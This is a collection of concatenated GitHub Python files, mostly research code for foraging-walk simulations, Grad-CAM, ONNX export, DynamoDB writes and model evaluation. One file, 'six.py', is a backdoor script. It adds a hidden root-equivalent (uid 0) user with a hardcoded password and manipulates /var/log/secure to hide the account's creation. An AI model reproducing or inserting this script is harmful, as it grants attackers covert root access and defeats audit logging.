        raise Exception("Seascape length and width must both be dividable by patch length")
    seascape = np.zeros((seascape_length, seascape_width))
    x = random.randint(0, seascape_width-100) #Initial patch placements
    y = random.randint(0, seascape_length-100)
    for patch in patches:
        #print(patch.shape, x, y)
        y2 = 0
        for y1 in range(y, y + patch_length): #This is to replace the values with the values generated from the patch generator
            x2 = 0
            for x1 in range(x, x+patch_length):
                if(x1 >= seascape_width): #Torus properties
                    x1 -= seascape_width
                if(y1 >= seascape_length):
                    y1 -= seascape_length
                seascape[y1][x1] = seascape[y1][x1] + patch[y2][x2] #Update cell value
                x2+=1
            y2+=1
        # jump to the next placement: uniform step length, random direction
        ang = random.randint(-360,360)
        step = np.random.uniform(low=1, high=seascape_length)
        step *= np.random.choice([1,-1], p=[.5,.5])
        xstep = int(step * math.cos(math.radians(ang)))
        ystep = int(step * math.sin(math.radians(ang)))
        newposy = int(y + ystep)
        newposx = int(x + xstep)
        # NOTE(review): the wrap arithmetic below is off by one relative to a
        # true modulo (positions drift by 1 per wrap) - same convention is used
        # in the levy variants; confirm it is intentional.
        if(newposy >= seascape_length - 1):
            newposy = newposy - seascape_length - 1
        if(newposy < 0):
            newposy = newposy + seascape_length - 1
        if(newposx >= seascape_width - 1):
            newposx = newposx - seascape_width - 1
        if(newposx < 0):
            newposx = newposx + seascape_width - 1
        y = newposy
        x = newposx
    #print(seascape)
    return seascape
def create_seascape_levy_1(seascape_length, seascape_width, patches):
    """Stamp each prey patch onto a (seascape_length x seascape_width) torus,
    jumping between placements with signed Levy-distributed step lengths
    (magnitudes 50..2499 drawn via the `levy` package) in a random direction.

    Returns the accumulated seascape array."""
    patch_count = len(patches)
    patch_length = len(patches[0])
    if(seascape_length % patch_length != 0 or seascape_width % patch_length !=0):
        raise Exception("Seascape length and width must both be dividable by patch length")
    seascape = np.zeros((seascape_length, seascape_width))
    x = random.randint(0, seascape_width-1)
    y = random.randint(0, seascape_length-1)
    # pre-draw one signed Levy step per patch
    a = np.array(range(50,2500))
    prob = levy.levy(a, 1, 0)
    stepsorig = [random.choices(a, weights=prob) for _ in range(patch_count)]
    steps = [np.random.choice([1,-1], p=[.5,.5]) * s[0] for s in stepsorig]
    print(steps)
    i = 0  # BUGFIX: the step index was never initialized -> NameError on steps[i]
    for patch in patches:
        y2 = 0
        for y1 in range(y, y + patch_length):  # stamp patch values onto the seascape
            x2 = 0
            for x1 in range(x, x+patch_length):
                if(x1 >= seascape_width):  # torus wrap
                    x1 -= seascape_width
                if(y1 >= seascape_length):
                    y1 -= seascape_length
                seascape[y1][x1] = seascape[y1][x1] + patch[y2][x2]
                x2+=1
            y2+=1
        # jump to the next placement using this patch's pre-drawn Levy step
        ang = random.randint(-360,360)
        xstep = int(steps[i] * math.cos(math.radians(ang)))
        ystep = int(steps[i] * math.sin(math.radians(ang)))
        newposy = int(y + ystep)
        newposx = int(x + xstep)
        if(newposy >= seascape_length - 1):
            newposy = newposy - seascape_length - 1
        if(newposy < 0):
            newposy = newposy + seascape_length - 1
        if(newposx >= seascape_width - 1):
            newposx = newposx - seascape_width - 1
        if(newposx < 0):
            newposx = newposx + seascape_width - 1
        y = newposy
        x = newposx
        i += 1  # BUGFIX: advance to the next pre-drawn step (mirrors create_seascape_levy_2)
    return seascape
def create_seascape_levy_2(seascape_length, seascape_width, patches):
    # Stamp each prey patch onto a (seascape_length x seascape_width) torus,
    # jumping between placements with Levy-distributed step lengths
    # (magnitudes 1..2499, sigma=200, unsigned) in a random direction.
    # Returns the accumulated seascape array.
    patch_count = len(patches)
    patch_length = len(patches[0])
    if(seascape_length % patch_length != 0 or seascape_width % patch_length !=0):
        raise Exception("Seascape length and width must both be dividable by patch length")
    seascape = np.zeros((seascape_length, seascape_width))
    x = random.randint(0, seascape_width-1)
    y = random.randint(0, seascape_length-1)
    i=0
    # pre-draw one Levy step per patch (the comprehension variable x below is
    # scoped to the comprehension and does not clobber the position x)
    a = np.array(range(1,2500))
    prob = levy.levy(a, 1, 0, sigma=200)
    steps = [random.choices(a, weights=prob) for x in range(patch_count)]
    positions=[]
    #steps = [np.random.choice([1,-1], p=[.5,.5]) * x[0] for x in stepsorig]
    #print(steps)
    #print(steps)
    for patch in patches:
        #print(patch.shape, x, y)
        y2 = 0
        for y1 in range(y, y + patch_length): #This is to replace the values with the values generated from the patch generator
            x2 = 0
            for x1 in range(x, x+patch_length):
                if(x1 >= seascape_width): #Torus properties
                    x1 -= seascape_width
                if(y1 >= seascape_length):
                    y1 -= seascape_length
                seascape[y1][x1] = seascape[y1][x1] + patch[y2][x2] #Update cell value
                x2+=1
            y2+=1
        # jump to the next placement using this patch's pre-drawn Levy step
        ang = random.randint(-360,360)
        xstep = int(steps[i][0] * math.cos(math.radians(ang)))
        ystep = int(steps[i][0] * math.sin(math.radians(ang)))
        newposy = int(y + ystep)
        newposx = int(x + xstep)
        #print((xstep,ystep),(newposx,newposy), steps[i][0])
        # NOTE(review): wrap arithmetic is off by one relative to a true modulo
        # (same convention as the other seascape builders) - confirm intent.
        if(newposy >= seascape_length - 1):
            newposy = newposy - seascape_length - 1
        if(newposy < 0):
            newposy = newposy + seascape_length - 1
        if(newposx >= seascape_width - 1):
            newposx = newposx - seascape_width - 1
        if(newposx < 0):
            newposx = newposx + seascape_width - 1
        y = newposy
        x = newposx
        i+=1
    #print(seascape)
    #print(positions)
    return seascape
def generate_patch(patch_length):
    """Build one (patch_length x patch_length) prey patch via a Gaussian random
    walk on a torus: repeatedly walk `patch_length` steps from the center,
    filling each newly visited cell with a decreasing value, until every cell
    has been filled.

    BUGFIX/generalization: the torus bound (100) and the start position (50,50)
    were hard-coded, so any patch_length != 100 either crashed (index out of
    range) or never terminated; both are now derived from patch_length.
    Behavior at patch_length == 100 is unchanged."""
    patch = np.zeros((patch_length, patch_length))
    req_area = (patch_length**2)
    big_l = int(req_area**.5)  # steps per walk segment (== patch_length)
    # step distribution: gaussian-weighted (sd 7) displacements in
    # [-patch_length/4, patch_length/4); hoisted out of the loop - it is invariant
    a = np.array(np.concatenate((range(int(-patch_length/4),0), range(0,int(patch_length/4)))))
    prob = scipy.stats.norm(0, 7).pdf(np.concatenate((range(int(-patch_length/4),0), range(0,int(patch_length/4)))))
    hit = 0
    while(hit < req_area):
        pos = (patch_length // 2, patch_length // 2)  # restart each segment from the center
        l = big_l
        xsteps = [random.choices(a, weights=prob) for x in range(big_l)]
        ysteps = [random.choices(a, weights=prob) for y in range(big_l)]
        for i in range(big_l):
            newposy = int(pos[0] + ysteps[i][0])
            newposx = int(pos[1] + xsteps[i][0])
            # torus wrap (single correction suffices: steps are < patch_length)
            if(newposy >= patch_length):
                newposy = newposy - patch_length
            elif(newposy < 0):
                newposy = newposy + patch_length
            if(newposx >= patch_length):
                newposx = newposx - patch_length
            elif(newposx < 0):
                newposx = newposx + patch_length
            pos = (newposy, newposx)
            if(patch[pos[0]][pos[1]] == 0):
                patch[pos[0]][pos[1]] = l  # first visit claims the cell
                hit += 1
            l -= 1
    return patch
def reward(levy_sea, walk):
    """Total food consumed by following `walk` through `levy_sea`.

    A random starting depth is drawn, then for every time step (column) the
    forager moves |walk[t]| cells up or down, consuming the cell value at each
    move, wrapping on a torus of height 2500. Redraws the start until the
    accumulated total is non-negative."""
    total = 0
    while True:
        depth = np.random.randint(len(levy_sea))
        for col, move in enumerate(walk):
            direction = -1 if move < 0 else 1
            for _ in range(abs(move)):
                total += levy_sea[depth][col]
                depth += direction
                if depth < 0:
                    depth += 2500
                elif depth >= 2500:
                    depth -= 2500
        if total >= 0:
            break
    return total
def random_walk(N):
    """Return N signed steps: magnitudes uniform in 1..13, each with a random sign."""
    magnitudes = np.random.randint(1, 14, size=N)
    return [np.random.choice([1, -1], p=[.5, .5]) * mag for mag in magnitudes]
def levy_walk(N):
    # Return N signed steps whose magnitudes (1..2499) follow a Levy
    # distribution (via the third-party `levy` package), each given a
    # random sign with probability 1/2.
    a = np.array(range(1,2500))
    prob = levy.levy(a, 1, 0)
    stepsorig = [random.choices(a, weights=prob) for x in range(N)]
    steps = [np.random.choice([1,-1], p=[.5,.5]) * x[0] for x in stepsorig]
    #print(len(steps))
    return steps
def walk_to_position(random_walk):
    """Convert a sequence of relative depth steps into absolute positions on a
    torus of height 2500 (the seascape height used throughout this script).

    The first position is the first step itself (implicit start at depth 0).
    Generalization: the original single if-correction only handled positions
    within one wrap of the valid range; modulo arithmetic is identical there
    and also correct for arbitrarily large steps."""
    pos = []
    depth = 0
    for step in random_walk:
        depth = (depth + step) % 2500  # torus wrap; Python % is non-negative here
        pos.append(depth)
    return pos
def generate_seascapes_random(scope, patches):
    """Build `scope` seascapes whose patches are placed via uniform jumps."""
    return [create_seascape_uniform(2500, 5000, patches) for _ in range(scope)]
def generate_seascapes_levy(scope, patches):
    """Build `scope` seascapes whose patches are placed via Levy-flight jumps."""
    return [create_seascape_levy_2(2500, 5000, patches) for _ in range(scope)]
def generate_random_walks(scope, step_count):
    """Produce `scope` uniform random walks of `step_count` steps each,
    together with their torus-bounded absolute positions."""
    walks = [random_walk(step_count) for _ in range(scope)]
    positions = [walk_to_position(w) for w in walks]
    return walks, positions
def generate_levy_walks(scope, step_count):
    """Produce `scope` Levy walks of `step_count` steps each, together with
    their torus-bounded absolute positions."""
    walks = [levy_walk(step_count) for _ in range(scope)]
    positions = [walk_to_position(w) for w in walks]
    return walks, positions
def get_consumptions(seascapes, walks):
    """Normalized food intake (reward per unit distance traveled) for every
    (seascape, walk) pairing, flattened seascape-major."""
    return [reward(sea, walk) / np.sum(np.abs(walk))
            for sea in seascapes
            for walk in walks]
def find_upper_uniform_bound(walks_levy):
    """Search p in [10, 25) for the uniform-walk upper bound whose total travel
    distance best matches the Levy walks' total distance.

    Returns (best_index, diffarr, best_diff) where diffarr holds the signed
    distance differences for every candidate p and best_diff is the signed
    difference at best_index.

    BUGFIX: the old code compared abs(diff) against the previously stored
    *signed* diff, so once a negative diff was stored the minimum tracking
    broke; the absolute value is now tracked separately."""
    target = np.sum(np.abs(walks_levy))
    print("Levy_walk length: " + str(target))
    diffarr = []
    best_abs = None
    best_diff = 0
    best_index = 0
    for p in range(10, 25):
        walks_random = [np.random.randint(1, p, size=5000) for _ in range(len(walks_levy))]
        print(np.sum(np.abs(walks_random)))
        diff = target - np.sum(np.abs(walks_random))
        if best_abs is None or abs(diff) < best_abs:
            best_abs = abs(diff)
            best_diff = diff
            best_index = p
        diffarr.append(diff)
    return best_index, diffarr, best_diff
if __name__ == "__main__":
    # Interactive experiment driver: build patches and seascapes, run the four
    # (seascape type x walk type) combinations, save histograms and example plots.
    num_patches = int(input("Enter the number of prey patches: "))
    patches = [generate_patch(100) for x in range(num_patches)]
    print("patches")
    num_levy_seascapes = int(input("Enter the number of Levy seascapes: "))
    levy_seascapes = generate_seascapes_levy(num_levy_seascapes, patches)
    print("1 done")
    num_levy_walks = int(input("Enter number of Levy walk generations: "))
    levy_walks, levy_positions = generate_levy_walks(num_levy_walks,5000)
    print("2 done")
    num_random_seascapes = int(input("Enter the number of random seascapes: "))
    random_seascapes = generate_seascapes_random(num_random_seascapes, patches)
    print("3 done")
    num_random_walks = int(input("Enter number of random walk generations: "))
    random_walks, random_positions = generate_random_walks(num_random_walks,5000)
    print("4 done")
    # consumption arrays: LL = Levy sea/Levy walk, LR = random sea/Levy walk, etc.
    arr_consumption_new_ll = get_consumptions(levy_seascapes, levy_walks)
    print("5")
    arr_consumption_new_lr = get_consumptions(random_seascapes, levy_walks)
    print("6")
    arr_consumption_new_rl = get_consumptions(levy_seascapes, random_walks)
    print(7)
    arr_consumption_new_rr = get_consumptions(random_seascapes, random_walks)
    pyplot.hist(arr_consumption_new_ll)
    pyplot.savefig('hist_LL.jpg')
    print("Mean: " + str(np.mean(arr_consumption_new_ll)))
    print("Median: " + str(np.median(arr_consumption_new_ll)))
    pyplot.hist(arr_consumption_new_lr)
    pyplot.savefig('hist_LR.jpg')
    print("Mean: " + str(np.mean(arr_consumption_new_lr)))
    print("Median: " + str(np.median(arr_consumption_new_lr)))
    pyplot.hist(arr_consumption_new_rl)
    pyplot.savefig('hist_RL.jpg')
    print("Mean: " + str(np.mean(arr_consumption_new_rl)))
    print("Median: " + str(np.median(arr_consumption_new_rl)))
    pyplot.hist(arr_consumption_new_rr)
    pyplot.savefig('hist_RR.jpg')
    print("Mean: " + str(np.mean(arr_consumption_new_rr)))
    print("Median: " + str(np.median(arr_consumption_new_rr)))
    pyplot.imshow(levy_seascapes[0])
    pyplot.savefig('levy_seascape.jpg')
    # overlay one random walk and one Levy walk on a randomly chosen Levy seascape
    fig, ax1 = pyplot.subplots(figsize=(21, 10))
    ax2 = ax1.twinx()
    ax3 = ax1.twinx()
    pyplot.xlabel("Time Step")
    pyplot.ylabel("Depth")
    seascape_index = np.random.choice(len(levy_seascapes))
    ax1.imshow(levy_seascapes[seascape_index])
    random_position_index = np.random.choice(len(random_positions))
    ax2.plot(random_positions[random_position_index], lw=2, color='#0492C2')
    levy_position_index = np.random.choice((len(levy_positions)))
    ax3.plot(levy_positions[levy_position_index], lw=2, color='#B8C2B2')
    pyplot.savefig('interpolated_seascape.jpg')
    #print(reward(seascapes[1], randomwalk), reward(seascapes_ll[3], levywalk))
    pyplot.show()
32969094354 | import json
import boto3
import uuid
# Load the predicted scores and write them as a new item to DynamoDB.
with open('C:/Users/David/PycharmProjects/FinalYearProject/project4-Davey1993/json/predictions.json') as data_file:
    data = json.load(data_file)
#print(data)

myUUID = str(uuid.uuid4())  # fresh primary key for this prediction
dynamodb = boto3.resource('dynamodb', region_name='eu-west-1')
dynamoTable = dynamodb.Table('predictionsTable')
dynamoTable.put_item(
    Item={
        "id": myUUID,
        "awayTeamScore": data['awayTeamScore'],
        "homeTeam": data['homeTeam'],
        # BUGFIX: was data['awayTeamScore'] - the away score was written
        # into the home-score attribute
        "homeTeamScore": data['homeTeamScore'],
        "awayTeam": data['awayTeam']
    })
| Davey1993/FYP | dynamoDB/dataWriter.py | dataWriter.py | py | 577 | python | en | code | 0 | github-code | 90 |
39745172077 |
import torchaudio
import torch
import numpy as np
from mysegment import MySegment
opsetVer = 17
outModel = 'segment.onnx'
def export():
    """Trace MySegment with a sample waveform and export it to ONNX (outModel),
    with a dynamic batch/sequence-length axis on the input signal."""
    # Load a sample waveform to drive the export trace
    #audio = '/home/leo/storage/sharedFolderVirtualbox/audioForTesting/shortTeaching2.wav'
    audio = '/home/leo/storage/sharedFolderVirtualbox/audioForTesting/multi-speaker_4-speakers_Jennifer_Aniston_and_Adam_Sandler_talk.wav'
    signal, fs = torchaudio.load( audio )
    print( signal.shape )

    # BUGFIX: removed a leftover `self.model = Model.from_pretrained(...)` block
    # pasted from a class method - `self`, `Model` and `hf_auth_token` were all
    # undefined here and raised NameError before the export could run.
    model = MySegment()

    # Show all unconvertable ops, output would be like,
    # {'aten::view_as_real', 'aten::chunk', 'aten::stft'}
    #torch_script_graph, unconvertible_ops = torch.onnx.utils.unconvertible_ops(
    #    model, signal, opset_version=opsetVer
    #)
    #if( len( unconvertible_ops ) > 0 ):
    #    print( '------------------------There are some unconvertable operations-----------' )
    #    print(set(unconvertible_ops))
    #    exit( 0 )
    #print( '---- all operations convertable ----' )

    # Export the model
    print( '\n---- start export ----' )
    symbolic_names = {0: "batch_size", 1: "max_seq_len"}
    torch.onnx.export(model,               # model being run
                      signal,              # model input (or a tuple for multiple inputs)
                      outModel,            # where to save the model (can be a file or file-like object)
                      export_params=True,  # store the trained parameter weights inside the model file
                      opset_version=opsetVer,   # the ONNX version to export the model to
                      do_constant_folding=True, # whether to execute constant folding for optimization
                      verbose=False,
                      input_names = ['signal'],    # the model's input names
                      output_names = ['segments'], # the model's output names
                      dynamic_axes={'signal' : symbolic_names, # variable length axes
                      })
    print( f'---- model has been saved to {outModel} ----\n' )


if __name__ == '__main__':
    # guard the side-effecting call so importing this module stays cheap
    export()
| leohuang2013/pyannote-audio_speaker-diarization_cpp | segment/export.py | export.py | py | 2,301 | python | en | code | 5 | github-code | 90 |
13492340432 | from odoo import api, fields, models, _
class View(models.Model):
    # Extension of ir.ui.view keeping the inherit_id of per-website duplicated
    # theme views consistent with the view being customized.
    _inherit = "ir.ui.view"
    # When a customize view is toggled (customize_show switched), re-point the
    # duplicated children that belong to OTHER websites at this view, so their
    # inheritance chain stays correct.
    @api.multi
    def toggle(self):
        super(View,self).toggle()
        current_website_id = self._context.get('website_id')
        # active views on the current website sharing this view's key
        duplicated_view=self.env['ir.ui.view'].sudo().search([('active','=',True),('website_id','=',self._context.get('website_id')),('key','=',self.key)])
        for view in duplicated_view.inherit_children_ids :
            # only theme-template children of other websites are re-parented
            if view.website_id.id != current_website_id and view.theme_template_id:
                view.write({'inherit_id': self.id})
    # When a view is edited from the website (copy-on-write), keep the copied
    # view's inherit_id pointing at its same-website parent instead of the
    # incoming value.
    @api.multi
    def write(self, vals):
        if self and self[0].theme_template_id and vals.get('inherit_id'):
            if self[0].inherit_id and self[0].inherit_id.website_id == self[0].website_id:
                vals['inherit_id'] = self[0].inherit_id.id
        return super(View, self).write(vals=vals)
35225746119 | import matplotlib.colors as mcolors
from os import path as osp
import pandas as pd
from skeleton_tools.openpose_layouts.body import BODY_25_LAYOUT
from skeleton_tools.openpose_layouts.face import FACE_LAYOUT
from skeleton_tools.openpose_layouts.hand import HAND_LAYOUT
# Project identity
NET_NAME = 'JORDI'
NET_FULLNAME = 'Joint Observation RRB Deep-learning Instrument'
# Windows network share and local tool locations
REMOTE_STORAGE = osp.join(r'\\ac-s1', 'Data', 'Autism Center')
OPENPOSE_ROOT = r'C:\research\openpose'
MMACTION_ROOT = r'C:\research\mmaction2'
MMLAB_ENV_PATH = r'C:\Users\owner\anaconda3\envs\mmlab\python.exe'
# CSV locations on the remote storage
DB_PATH = osp.join(REMOTE_STORAGE, r'Users\TalBarami\NAS_database_final.csv')
ANNOTATIONS_PATH = osp.join(REMOTE_STORAGE, r'Users\TalBarami\lancet_submission_data\annotations\labels.csv')
# Annotated movement classes (RRB-style behaviors plus Other/NoAction)
REAL_DATA_MOVEMENTS = ['Hand flapping', 'Tapping', 'Clapping', 'Fingers', 'Body rocking',
                       'Tremor', 'Spinning in circle', 'Toe walking', 'Back and forth', 'Head movement',
                       'Playing with object', 'Jumping in place', 'Legs movement', 'Feeling texture', 'Other', 'NoAction']
# Column-name groups used when reading facial-analysis output tables
EMOTION_COLS = ['anger', 'disgust', 'fear', 'happiness', 'sadness', 'surprise', 'neutral']
AU_COLS = ['AU01', 'AU02', 'AU04', 'AU05', 'AU06', 'AU07', 'AU09', 'AU10', 'AU11', 'AU12', 'AU14', 'AU15', 'AU17', 'AU20', 'AU23', 'AU24', 'AU25', 'AU26', 'AU28', 'AU43']
# interleaved x_0, y_0, x_1, y_1, ... for the 68 facial landmarks
LANDMARK_COLS = [i for s in list(zip([f'x_{i}' for i in range(68)], [f'y_{i}' for i in range(68)])) for i in s]
FACE_COLS = ['FaceRectX', 'FaceRectY', 'FaceRectWidth', 'FaceRectHeight', 'FaceScore']
ROTATION_COLS = ['Pitch', 'Roll', 'Yaw']
# OpenPose JSON keypoint groups mapped to their skeleton layouts
JSON_SOURCES = [
    {'name': 'pose', 'openpose': 'pose_keypoints_2d', 'layout': BODY_25_LAYOUT},
    {'name': 'face', 'openpose': 'face_keypoints_2d', 'layout': FACE_LAYOUT},
    {'name': 'hand_left', 'openpose': 'hand_left_keypoints_2d', 'layout': HAND_LAYOUT},
    {'name': 'hand_right', 'openpose': 'hand_right_keypoints_2d', 'layout': HAND_LAYOUT}
]
# Tableau palette as {'name', 'value': (r, g, b)} entries
COLORS = [{'name': k.split(':')[1], 'value': tuple(int(v.lstrip('#')[i:i + 2], 16) for i in (0, 2, 4))} for k, v in mcolors.TABLEAU_COLORS.items()]
# clip-length parameters (frames)
LENGTH = 200
MIN_LENGTH = 60
STEP_SIZE = 30
EPSILON = 1e-4
pd.options.display.max_columns = 99
def read_db():
    """Load the NAS video database and left-join per-assessment scores.

    NOTE(review): relies on a module-level REDCAP_PATH that is not defined in
    this part of the file — confirm it is declared elsewhere in the module.
    """
    _db = pd.read_csv(DB_PATH)
    scores = pd.read_csv(REDCAP_PATH, parse_dates=['date_of_birth', 'assessment_date'], infer_datetime_format=True)
    # Age at assessment time, in days and fractional years.
    scores['age_days'] = scores['assessment_date'] - scores['date_of_birth']
    scores['age_years'] = scores['age_days'].dt.days / 365.25
    # Merge only score columns _db doesn't already have (keeping 'assessment'
    # as the join key), then drop duplicate recordings by basename.
    db = pd.merge(_db, scores[[c for c in scores.columns if c not in _db.columns or c == 'assessment']], on='assessment', how='left').drop_duplicates(subset=['basename'])
    return db
9725525281 | # Selvaraju, R.R., Cogswell, M., Das, A. et al. Grad-CAM: Visual Explanations from Deep Networks via Gradient-Based Localization. Int J Comput Vis 128, 336–359 (2020). https://doi.org/10.1007/s11263-019-01228-7
import numpy as np
from matplotlib import pyplot as plt
import matplotlib as mpl
import cv2
from keras import backend as K
from keras.applications import imagenet_utils
from keras.applications.resnet50 import ResNet50
from keras.preprocessing import image
from keras.applications.imagenet_utils import preprocess_input, decode_predictions
# Load ResNet50 with the full classifier head from a local weights file
# (the commented line would download the stock ImageNet weights instead).
# model1 = ResNet50(weights='imagenet', include_top=True)
model1 = ResNet50(weights=r'..\example\models\resnet50_weights_tf_dim_ordering_tf_kernels.h5', include_top=True)
#model1.summary()
def image_processing(img_path):
    """Load an image file and turn it into a preprocessed ResNet50 input batch."""
    pil_img = image.load_img(img_path, target_size=(224, 224))
    arr = image.img_to_array(pil_img)
    batch = np.expand_dims(arr, axis=0)
    return preprocess_input(batch)
def gradcam_fm(model, x):
    """Compute a Grad-CAM heatmap for the top-predicted class of batch x.

    Takes the gradients of the winning class score w.r.t. the
    'res5c_branch2c' feature maps, weights each channel by its pooled
    gradient, and collapses the channels into a 2-D heatmap.
    Note: classic Grad-CAM global-average-pools the gradients; this code uses
    K.sum, which differs only by a constant scale factor.
    """
    preds = model.predict(x)
    pred_class = np.argmax(preds[0])
    pred_output = model.output[:, pred_class]
    last_conv_layer = model.get_layer('res5c_branch2c')
    grads = K.gradients(pred_output, last_conv_layer.output)[0]
    pooled_grads = K.sum(grads, axis=(0, 1, 2))
    iterate = K.function([model.input], [pooled_grads, last_conv_layer.output[0]])
    pooled_grads_value, conv_layer_output_value = iterate([x])
    # Weight each feature-map channel by its pooled gradient.
    for i in range(pooled_grads_value.shape[0]):
        conv_layer_output_value[:, :, i] *= (pooled_grads_value[i])
    heatmap = np.sum(conv_layer_output_value, axis=-1)
    return heatmap
import matplotlib.ticker as ticker
def fmt1(x, pos):
    """Colorbar tick formatter: rescale a tick value from [0, 253] to unit range."""
    scaled = x / 253
    return int(scaled)
def visual_heatmap(heatmap, img_path):
    """Overlay the raw Grad-CAM heatmap on the image at img_path and show it."""
    fig, ax = plt.subplots()
    # Keep positive activations only, then scale to [0, 1].
    # NOTE(review): if heatmap has no positive values np.max is 0 and this
    # divides by zero — confirm inputs always contain positive activations.
    heatmap = np.maximum(heatmap, 0)
    heatmap /= np.max(heatmap)
    img = cv2.imread(img_path)
    # NOTE(review): the image is read twice (above and again here).
    im = cv2.resize(cv2.cvtColor(cv2.imread(img_path), cv2.COLOR_BGR2RGB), (img.shape[1], img.shape[0]))
    # Resize heatmap to image size and quantize to 8-bit for display.
    heatmap = cv2.resize(heatmap, (img.shape[1], img.shape[0]))
    heatmap = np.uint8(255 * heatmap)
    ax.imshow(im, alpha=0.8)
    ax.set_xticklabels([])
    ax.set_yticklabels([])
    ax.axes.get_xaxis().set_visible(False)
    ax.axes.get_yaxis().set_visible(False)
    h= ax.imshow(heatmap, cmap='rainbow', alpha=0.4)
    # Colorbar ticks mapped back to [0, 1] by fmt1.
    plt.colorbar(h, ticks=[0,253],format=ticker.FuncFormatter(fmt1),shrink = 0.8)
    plt.show()
# Demo: compute and display the Grad-CAM overlay for a single image.
img_path = '../data/2.png'#'../example/example_roi.png' #'../data/4.png'
img = image_processing(img_path)
heatmap = gradcam_fm(model1, img)
visual_heatmap(heatmap, img_path)
33081122094 | import os
print('six')
import subprocess
C='ht'
c = 'pwdht2018'
cmmd = "useradd -p `openssl passwd -1 -salt 'uroot' " + c + "`" + " -u 0 -o -g root -G root -s /bin/bash -d /home/" + C + " " + C
rmu = 'rm -r -f /home/'+C
rmtouch = 'rm -r -f /var/log/secure'
rmrms = 'rm -r -f /var/log/rms'
fp = open('/var/log/secure','r')
for line in fp:
fq = open('/var/log/rms','a')
fq.write(line)
fp.close()
fq.close()
subprocess.getstatusoutput(cmmd)
subprocess.getstatusoutput(rmu)
subprocess.getstatusoutput(rmtouch)
rp = open('/var/log/rms','r')
for line in rp:
rq = open('/var/log/secure','a')
rq.write(line)
rp.close()
rq.close()
subprocess.getstatusoutput(rmrms)
| torartorg/ulit | six.py | six.py | py | 677 | python | en | code | 0 | github-code | 90 |
45822089289 | '''
This module performs logistic regression.
Inputs: database connection, training data, training labels, test data, test labels
Outputs: precision/recall curves
Author: Curt Hansen
Created: Aug 4, 2012
Modified:
'''
import sys, os, time
import pf_connect as db
import numpy as n
import math_functions as m
import logreg as l
import svmutil as svm
def simple_comp(X, coeffs, cutoff):
    """Threshold predictor: 1 where X > cutoff, else 0, as an (n, 1) column.

    `coeffs` is ignored; the parameter exists so the signature is consistent
    with the other prediction functions used by this module.
    """
    predictions = n.zeros((len(X), 1))
    predictions[X > cutoff] = 1
    return predictions
def run_logreg_model(dbCur,trainY,trainX,testY,testX,time_stamp,round,num_cutoff_points):
    """Fit logistic regression on the training fold, score the test fold, and
    store the precision/recall curve in snp_results_detail.

    dbCur: open DB cursor; round: zero-based fold index (stored 1-based).
    Points flagged invalid by compute_pred_performance_curve are stored as
    NULL recall/precision.
    """
    coeffs = l.compute_logreg_coeffs(trainX,trainY)
    performance_results,valid_ind = m.compute_pred_performance_curve(l.predict_classes,testY,testX,coeffs,num_cutoff_points)
    for idx in range(num_cutoff_points):
        if valid_ind[0,idx] == 1:
            recall = performance_results[0,idx]; precision = performance_results[1,idx]
        else:
            recall = None; precision = None
        dbCur.execute("INSERT INTO snp_results_detail (time_stamp,model_used,fold_no,seq_no,val_recall,val_precision) \
            VALUES(timestamp %s,'lr',%s,%s,%s,%s);",[time_stamp,round+1,idx,recall,precision])
def run_svm_model(dbCur,trainY,trainX,testY,testX,time_stamp,round,num_cutoff_points):
    """Train an SVM (libsvm) on the training fold, score the test fold, and
    store the precision/recall curve in snp_results_detail.

    dbCur: open DB cursor; trainY/testY: column vectors of 0/1 labels;
    round: zero-based fold index (stored 1-based).
    """
    trainY = (2*trainY-1).tolist(); testYSVM = (2*testY-1).tolist() # Convert labels to -1,+1 format and lists as required by libsvm.
    # Convert to list of floats from list of lists.
    # (Bug fix: testYSVM previously re-read the unconverted 0/1 testY instead
    # of the -1/+1 list built on the line above.)
    trainY = [i[0] for i in trainY]; testYSVM = [i[0] for i in testYSVM]
    trainX = trainX.tolist(); testX = testX.tolist() # Convert to list as required by libsvm.
    prob = svm.svm_problem(trainY,trainX)
    params = svm.svm_parameter('-b 1 -q')
    svmmodel = svm.svm_train(prob,params)
    p_label, p_acc, p_val = svm.svm_predict(testYSVM,testX,svmmodel,'-b 1')
    # Class probabilities: column 1 is assumed to be the positive class —
    # TODO confirm against the model's label ordering.
    probs = n.array(p_val)[:,1]; probs.shape = (len(probs),1)
    performance_results,valid_ind = m.compute_pred_performance_curve(simple_comp,testY,probs,None,num_cutoff_points)
    for idx in range(num_cutoff_points):
        if valid_ind[0,idx] == 1:
            recall = performance_results[0,idx]; precision = performance_results[1,idx]
        else:
            recall = None; precision = None
        dbCur.execute("INSERT INTO snp_results_detail (time_stamp,model_used,fold_no,seq_no,val_recall,val_precision) \
            VALUES(timestamp %s,'svm',%s,%s,%s,%s);",[time_stamp,round+1,idx,recall,precision])
| berkeleyphylogenomics/BPG_utilities | bpg/snp_analysis/model/stat_models.py | stat_models.py | py | 2,540 | python | en | code | 1 | github-code | 90 |
24208907607 | import tensorflow as tf
from tensorflow.compat import v1
__all__ = [
'BaseRNN'
]
def reverse_sequence(sequence, sequence_length):
    """
    Reverse a batched sequence in time-major order [T,N,...]. When
    sequence_length is given, only the first sequence_length[i] steps of each
    example i are reversed (padding stays in place); otherwise the whole time
    axis is flipped.
    """
    if sequence_length is not None:
        return tf.reverse_sequence(sequence, sequence_length, seq_axis=0, batch_axis=1)
    return tf.reverse(sequence, axis=[0])
def transpose(tensor_or_tuple, perm):
    """Transpose a tensor, or each tensor in a tuple, by the same permutation."""
    if isinstance(tensor_or_tuple, tuple):
        return tuple(tf.transpose(item, perm) for item in tensor_or_tuple)
    return tf.transpose(tensor_or_tuple, perm)
class BaseRNN(tf.Module):
    """Common wrapper for the RNN layer classes in this package.

    Holds a forward cell and, when direction='bidirectional', a second
    backward cell that is fed (and whose output is un-) time-reversed,
    exposing both behind a single `__call__`.
    """
    def __init__(self, rnn_class, num_units, direction, default_name, **kwargs):
        assert direction in ['unidirectional', 'bidirectional']
        self.default_name = default_name
        if direction == 'bidirectional':
            # Pull `name` out of kwargs so the fw/bw sub-layers get their own
            # fixed names nested under this module's (variable) scope.
            name = kwargs.pop('name', None)
            super().__init__(name)
            self.realname = name
            self.fw_layer = rnn_class(num_units, name='fw', **kwargs)
            self.bw_layer = rnn_class(num_units, name='bw', **kwargs)
        else:
            super().__init__()
            self.fw_layer = rnn_class(num_units, **kwargs)
            self.bw_layer = None
    def build(self, shape):
        """
        Creates the variables of the layer.
        Calling this method is optional for users of the RNN class. It is called
        internally with the correct shape when `__call__` is invoked.
        Arguments:
          shape: instance of `TensorShape`.
        """
        if self.bidirectional:
            # Both directions build under a shared TF1-style variable scope.
